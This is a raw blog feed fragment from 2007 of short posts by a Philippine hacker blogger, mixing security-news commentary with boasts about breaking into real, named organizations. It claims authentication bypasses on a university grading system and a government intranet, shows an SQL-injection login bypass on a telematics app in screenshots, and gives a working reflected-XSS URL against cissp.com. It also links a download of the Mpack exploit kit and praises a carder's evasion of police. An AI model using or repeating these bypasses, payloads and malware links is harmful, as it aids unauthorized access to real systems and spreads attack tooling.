href='http://wehavedayjobs.blogspot.com/feeds/3197629455135083289/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=3197629455135083289' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3197629455135083289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3197629455135083289'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2008/01/dotproject-exploit-0day.html' title='Dotproject Exploit ( 0day )'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5644508568986706665</id><published>2007-12-30T20:35:00.000+08:00</published><updated>2007-12-30T20:48:35.970+08:00</updated><title type='text'>Pangasinan State University's Xsystem 2007</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/xsystem1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sujiru.googlepages.com/xsystem1.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;From their &lt;a href="http://psu.edu.ph/"&gt;website&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"All ICT students who have undergone the computerized enrolment through the XSystem 2007 this 2nd Semester 2007-2008 can now access their individual student portals to view their Transcript of Records and Account Ledgers online by logging-in their secured accounts issued by the XSystem Administrator."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;You can change the grades and other stuff once you bypass the authentication.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/psu.JPG"&gt;&lt;img style="width = 200px; display: block; text-align: center; cursor: pointer;" src="http://sujiru.googlepages.com/psu.JPG" alt=""  /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5644508568986706665?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5644508568986706665/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5644508568986706665' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5644508568986706665'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5644508568986706665'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/12/pangasinan-state-universitys-xsystem.html' title='Pangasinan State University&apos;s Xsystem 2007'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-660715236756925863</id><published>2007-12-10T23:52:00.000+08:00</published><updated>2007-12-11T00:08:48.187+08:00</updated><title type='text'>HSBC Security Device</title><content type='html'>Here are the pictures of the &lt;a href="http://en.wikipedia.org/wiki/HSBC"&gt;HSBC&lt;/a&gt; security device which a client needs to login to his online HSBC account. It's kinda like SecurID. More information about these kind of devices can be found &lt;a href="http://en.wikipedia.org/wiki/SecurID"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sujiru.googlepages.com/hsbc1.jpg"&gt;&lt;img style="width: 200px;" alt="" src="http://sujiru.googlepages.com/hsbc1.jpg" border="0" /&gt;&lt;/a&gt;  &lt;a href="http://sujiru.googlepages.com/hsbc2.jpg"&gt;&lt;img style="width: 200px;" alt="" src="http://sujiru.googlepages.com/hsbc2.jpg" border="0" /&gt;&lt;/a&gt;  &lt;a href="http://sujiru.googlepages.com/hsbc3.jpg"&gt;&lt;img style="width: 200px;" alt="" src="http://sujiru.googlepages.com/hsbc3.jpg" border="0" /&gt;&lt;/a&gt;  &lt;a href="http://sujiru.googlepages.com/hsbc4.jpg"&gt;&lt;img style="width: 200px;" alt="" src="http://sujiru.googlepages.com/hsbc4.jpg" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-660715236756925863?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/660715236756925863/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=660715236756925863' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/660715236756925863'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/660715236756925863'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/12/hsbc-security-device.html' title='HSBC Security Device'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-6021744458530855088</id><published>2007-11-08T17:12:00.000+08:00</published><updated>2007-11-08T17:22:06.654+08:00</updated><title type='text'>WabiSabiLabi founder arrested for alleged spying</title><content type='html'>&lt;a href="http://www.techworld.com/security/news/index.cfm?newsID=10565"&gt;http://www.techworld.com/security/news/index.cfm?newsID=10565&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Roberto Preatoni was charged Monday with unauthorised access to computer systems and wiretapping, said the reports (in Italian). Sources confirmed he is the same Roberto Preatoni who is a founder and director of strategy with WabiSabiLabi. A representative at the security startup declined to comment Tuesday. He said the company would email a statement later in the day. &lt;br /&gt;Preatoni's company was launched in July, billing itself as an online marketplace for exploit code that could be used to hack into computer systems. Legitimate companies such as 3Com and Verisign have paid for this type of code in the past, but WabiSabiLabi was the first open marketplace for such software."&lt;br /&gt;&lt;br /&gt;[snip]&lt;br /&gt;&lt;br /&gt;"In January, four others were charged with spying in connection with the scandal. They included Fabio Ghioni, vice president and security CTO (chief technology officer) at Telecom Italia, and Giuliano Tavaroli, the telco's former head of security."&lt;br /&gt;&lt;br /&gt;[A security CTO and a former head of security of a telecom company being charged of spying. Makes you think doesn't it?]]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-6021744458530855088?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/6021744458530855088/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=6021744458530855088' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6021744458530855088'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6021744458530855088'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/11/wabisabilabi-founder-arrested-for.html' title='WabiSabiLabi founder arrested for alleged spying'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7852463360916873297</id><published>2007-11-02T00:00:00.000+08:00</published><updated>2007-11-02T00:12:14.098+08:00</updated><title type='text'>Increasing demand for cybersecurity pros in RP seen</title><content type='html'>&lt;a href="http://newsinfo.inquirer.net/breakingnews/infotech/view_article.php?article_id=98133"&gt;http://newsinfo.inquirer.net/breakingnews/infotech/view_article.php?article_id=98133&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"MANILA, Philippines--A computer school and two cybersecurity experts have said that there is increasing demand for cybersecurity professionals in the Philippines."&lt;br /&gt;&lt;br /&gt;"Computer school Informatics said that a certified cybersecurity professionals can command an average of $35,000 to $80,000 of monthly income in the US."&lt;br /&gt;&lt;br /&gt;[Informatics offer a CEH (Certified Ethical Hacker)Course for about 30,000 PHP. The number of registrants must be quite low]&lt;br /&gt;&lt;br /&gt;"In the Philippines, Albert dela Cruz, who is a director of the Philippine Computer Emergency Response Team, said that the pay scale could be lower."&lt;br /&gt;&lt;br /&gt;[most definitely]&lt;br /&gt;&lt;br /&gt;"Dela Cruz also pointed out that more local organizations are now recognizing the need to protect their critical infrastructure by creating a new position: the information security officer.&lt;br /&gt;&lt;br /&gt;"Security should be everybody's concern. One weak link in the chain can affect everybody else," he stressed."&lt;br /&gt;&lt;br /&gt;[We need a scapegoat to kick around when our company database gets whacked]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7852463360916873297?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7852463360916873297/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7852463360916873297' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7852463360916873297'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7852463360916873297'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/11/increasing-demand-for-cybersecurity.html' title='Increasing demand for cybersecurity pros in RP seen'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-6540745071639730144</id><published>2007-11-01T23:33:00.000+08:00</published><updated>2007-11-01T23:35:34.715+08:00</updated><title type='text'>IMX / Nextel</title><content type='html'>&lt;div&gt;&lt;em&gt;Who provides NAKTF fast, reliable and secure connections for their relentless crusade against the heinous crime of kidnapping?&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.imx.ph/"&gt;IMX&lt;/a&gt; does.&lt;br /&gt;&lt;br /&gt;A vulnerability exists in their Telematics web application. It's location is hardcoded into their client units' browser. Basically it's an sql injection issue. The novel part is that mode of transport is by radio waves (&lt;a href="http://imx.ph/AboutUs/iden_tech.html"&gt;Iden Technology&lt;/a&gt;). &lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;A regular failed login;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a href="http://sujiru.googlepages.com/1imx.JPG"&gt;&lt;img style="width: 200px;" alt="The Telematics Page" src="http://sujiru.googlepages.com/1imx.JPG" border="0" /&gt;&lt;/a&gt;      &lt;a href="http://sujiru.googlepages.com/2imx.JPG"&gt;&lt;img style="width: 200px;" alt="Let's get loaded" src="http://sujiru.googlepages.com/2imx.JPG" border="0" /&gt;&lt;/a&gt;      &lt;a href="http://sujiru.googlepages.com/3imx.JPG"&gt;&lt;img style="width: 200px;" alt="Wanna know who I am?" src="http://sujiru.googlepages.com/3imx.JPG" border="0" /&gt;&lt;/a&gt;   &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/4imx.JPG"&gt;&lt;img style="cursor: pointer; width: 200px;" src="http://sujiru.googlepages.com/4imx.JPG" alt="" border="0" /&gt;&lt;/a&gt;   &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/5imx.JPG"&gt;&lt;img style="cursor: pointer; width: 200px;" src="http://sujiru.googlepages.com/5imx.JPG" alt="Whoops" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;By exploiting the issue we successfully log in;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;   &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/6imx.JPG"&gt;&lt;img style="cursor: pointer; width: 200px;" src="http://sujiru.googlepages.com/6imx.JPG" alt="Logged in using the bypass" border="0" /&gt;&lt;/a&gt;   &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/8imx.JPG"&gt;&lt;img style="cursor: pointer; width: 200px;" src="http://sujiru.googlepages.com/8imx.JPG" alt="We need the PTN though" border="0" /&gt;&lt;/a&gt;   &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sujiru.googlepages.com/9imx.JPG"&gt;&lt;img style="cursor: pointer; width: 200px;" src="http://sujiru.googlepages.com/9imx.JPG" alt="Go for the 500" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-6540745071639730144?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/6540745071639730144/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=6540745071639730144' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6540745071639730144'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6540745071639730144'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/10/imx-nextel.html' title='IMX / Nextel'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4925628324074712866</id><published>2007-10-25T20:53:00.000+08:00</published><updated>2007-10-25T21:05:41.949+08:00</updated><title type='text'>Gov't, private sector revive push for RP cybercrime law</title><content type='html'>&lt;a href="http://technology.inquirer.net/infotech/infotech/view_article.php?article_id=96490"&gt;http://technology.inquirer.net/infotech/infotech/view_article.php?article_id=96490&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Among the groups supporting the cybercrime bill are the Philippine Certified Information Systems Security Professionals of the Philippines (PH-CISSP), the Information Systems Audit and Control Association (ISACA), the Philippine Software Industry Association (PSIA), the Philippine Computer Society (PCS) and the Information Systems Security Society of the Philippines (ISSSP), said Albert dela Cruz, director of the Philippine Computer Emergency Response Team (PH-CERT) and currently platform strategy manager at Microsoft Philippines, in an interview"&lt;br /&gt;&lt;br /&gt;[hmm, microsoft supported..]&lt;br /&gt;&lt;br /&gt;"As you know we've been at it for more than seven years or even longer. I've lost count. We never made it past plenary of the House of Representatives. Now, with the DOJ and renewed support from the CICT, we hope that they make this a priority measure," he added."&lt;br /&gt;&lt;br /&gt;[seven years? there must be a reason]&lt;br /&gt;&lt;br /&gt;"For years, various sectors have been lobbying for a cybercrime law in the country. Dela Cruz said the cybercrime bill aims strengthen and align the country's laws on cyber security and protection, while also creating international cooperation among other countries considering that cybercrime is a global phenomenon"&lt;br /&gt;&lt;br /&gt;[I thought the &lt;a href="http://www.army.mil.ph/miscellaneous/e_commerce.html"&gt;E-commerce law&lt;/a&gt; was supposed to cover cybercrime (Section 3.3)]&lt;br /&gt;&lt;br /&gt;""We want to be part of the Europen Union Cybercrime Treaty. To effectively combat cybercrime across borders and jurisdiction a common law (similar laws individually) or a treaty needs to be in place. And to be able to sign the treaty, we have to pass a bill that is in consonance with the prescription of the treaty," Dela Cruz added"&lt;br /&gt;&lt;br /&gt;[Ah ok, so the law we passed is not good enough :) ]&lt;br /&gt;&lt;br /&gt;Tuta nga ba?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4925628324074712866?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4925628324074712866/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4925628324074712866' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4925628324074712866'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4925628324074712866'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/10/govt-private-sector-revive-push-for-rp.html' title='Gov&apos;t, private sector revive push for RP cybercrime law'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-3031881425752096379</id><published>2007-10-22T17:09:00.000+08:00</published><updated>2007-10-22T17:13:43.249+08:00</updated><title type='text'>FREE BEER!!!</title><content type='html'>&lt;a href="http://arstechnica.com/news.ars/post/20071019-brewery-offers-lifetime-supply-of-beer-in-return-for-stolen-laptop.html"&gt;http://arstechnica.com/news.ars/post/20071019-brewery-offers-lifetime-supply-of-beer-in-return-for-stolen-laptop.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"In an attempt to get the laptop back, the brewery is offering a somewhat unusual reward: a lifetime supply of free beer. Whoever fingers the thief will get a 12-pack per month (a bit skimpy, perhaps) for the rest of their days, according to the BBC."&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-3031881425752096379?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/3031881425752096379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=3031881425752096379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3031881425752096379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/3031881425752096379'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/10/free-beer.html' title='FREE BEER!!!'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-6972316132659947533</id><published>2007-10-01T19:15:00.000+08:00</published><updated>2007-10-01T19:22:32.967+08:00</updated><title type='text'>Sun Cellular giving free phones to hackers...</title><content type='html'>Got this from a source who refused to be named...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://suncellular.com.ph/phoneSpecs.aspx?cid=30"&gt;http://suncellular.com.ph/phoneSpecs.aspx?cid=30&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sujiru.googlepages.com/suncell.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://sujiru.googlepages.com/suncell.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-6972316132659947533?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/6972316132659947533/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=6972316132659947533' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6972316132659947533'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6972316132659947533'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/10/sun-cellular-giving-free-phones-to.html' title='Sun Cellular giving free phones to hackers...'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-6370981198158723462</id><published>2007-09-21T21:51:00.000+08:00</published><updated>2007-09-21T22:14:23.776+08:00</updated><title type='text'>Multiplicity</title><content type='html'>One of the more interesting stories to hit the net recently..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.theregister.co.uk/2007/09/18/max_butler_affidavit/"&gt;http://www.theregister.co.uk/2007/09/18/max_butler_affidavit/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.theregister.co.uk/2001/07/05/max_vision_begins_18month_term/"&gt;http://www.theregister.co.uk/2001/07/05/max_vision_begins_18month_term/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yet another example of the blurring of the line betwen "good" and "bad" hackers. &lt;br /&gt;&lt;br /&gt;"... Butler is known for his expertise in intrusion detection: the science of automatically analyzing Internet traffic for "signatures" indicative of an attack. Butler remains well-regarded among many security experts for creating and maintaining arachNIDS, a free, up-to-date catalog of attack signatures at WhiteHats.com."&lt;br /&gt;&lt;br /&gt;"King of the Carders &lt;br /&gt;Authorities' account of Butler fleshes out a dichotomy between &lt;br /&gt;ultra-secretive paranoia and a careless brazenness that in many ways &lt;br /&gt;mirrors the carder culture Butler sought to lead." &lt;br /&gt;&lt;br /&gt;Personally, I like the way he used different handles to mislead the authorities.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-6370981198158723462?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/6370981198158723462/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=6370981198158723462' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6370981198158723462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/6370981198158723462'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/09/multiplicity.html' title='Multiplicity'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-4321727331586175486</id><published>2007-09-10T14:56:00.000+08:00</published><updated>2007-09-11T18:24:01.716+08:00</updated><title type='text'>Store p0rn on a government computer</title><content type='html'>&lt;a href="http://www.pia.gov.ph/?m=2&amp;t=9"&gt;Philippine Information Agency Intranets&lt;/a&gt; provide a handy file storage service to those who know how to get pass the authentication. Interestingly enough this bug does not seem to be found on other &lt;em&gt;WebExplorer Lite v2.12&lt;/em&gt; applications out in the internet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-4321727331586175486?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/4321727331586175486/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=4321727331586175486' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4321727331586175486'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/4321727331586175486'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/09/store-0day-p0rn-on-government-computer.html' title='Store p0rn on a government computer'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-5076313022692261292</id><published>2007-09-10T14:50:00.000+08:00</published><updated>2007-09-11T18:26:03.331+08:00</updated><title type='text'>Scare Tactics</title><content type='html'>As is so typical in the cybersecurity industry today we have conferences where suppliers buy the rights to scare the attendees into buying their products. Welcome to &lt;a href="http://isssp.org.ph/manilacon.htm"&gt;ManilaCon 2k7&lt;/a&gt;! Don't get conned.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-5076313022692261292?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/5076313022692261292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=5076313022692261292' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5076313022692261292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/5076313022692261292'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/09/scare-tactics.html' title='Scare Tactics'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-7942951753949865312</id><published>2007-07-18T13:03:00.001+08:00</published><updated>2007-07-18T13:06:55.907+08:00</updated><title type='text'>CISSP XSS</title><content type='html'>&lt;a href="http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert%28%22Yehey,%20CISSP%20na%20ko%21%22%29%3C/script%3E&amp;c=184845"&gt;http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Yehey,%20CISSP%20na%20ko!%22)%3C/script%3E&amp;c=184845&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-7942951753949865312?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/7942951753949865312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=7942951753949865312' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7942951753949865312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7007896954058520891/posts/default/7942951753949865312'/><link rel='alternate' type='text/html' href='http://wehavedayjobs.blogspot.com/2007/07/cissp-xss.html' title='CISSP XSS'/><author><name>sujiru</name><uri>http://www.blogger.com/profile/12883083626992353427</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='22' src='http://sujiru.googlepages.com/2.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7007896954058520891.post-2765409771713743201</id><published>2007-07-16T16:36:00.000+08:00</published><updated>2007-07-16T16:46:39.233+08:00</updated><title type='text'>Mpack 0.90</title><content type='html'>Just for educational purposes here's a &lt;a href="http://sujiru.googlepages.com/pack90.zip"&gt;copy of Mpack v0.90&lt;/a&gt;. More info on Mpack may be found &lt;a href="http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.html"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7007896954058520891-2765409771713743201?l=wehavedayjobs.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wehavedayjobs.blogspot.com/feeds/2765409771713743201/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7007896954058520891&amp;postID=2765409771713743201' title='0 Comments'/><link rel='edit' 